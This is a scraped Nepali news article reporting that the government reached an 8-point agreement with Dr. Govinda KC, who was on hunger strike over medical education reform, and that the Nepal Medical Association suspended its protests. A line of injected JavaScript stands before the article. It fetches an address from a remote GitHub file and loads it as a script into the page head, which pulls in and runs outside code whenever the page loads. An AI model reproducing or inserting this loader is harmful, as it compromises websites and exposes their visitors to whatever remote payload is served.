;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});
असोज २५,
काठमाडौं । चिकित्सा शिक्षा सुधारका अभियान्ता अनसनरत डा. गोविन्दा केसीबिच ८ बुँदे सहमति भएको छ । योसंगै अन्सनरत डा. केसीले आज (आइतबार) बिहान ९ बजे अनसन त्याग गर्ने बताइएको छ । गएमध्यराती सरकार र डा. केही पक्षबिचसहमति भएको बताइएको छ ।
बुधबार सरकार र डाक्टर केसी पक्षले वार्ता टोली गठन गरे लगत्तै बिहीबार र शुक्रबार भएको वार्ता असफल भएपछि सरकारी वार्ता टोलीले शनिबार प्रधानमन्त्री केपी शर्मा ओली र शिक्षा मन्त्री गिरिराजमणि पोखरेलसँग छलफल गरेपछि सहमति जुटेको हो ।
नेपाल चिकित्सक संघले सरकारले डाक्टर गोविन्द केसीसँग वार्ताको सहमति भएपश्चात आन्दोलनका कर्यक्रम स्थगित गरेको छ ।
फेसबुक प्रतिक्रियाहरु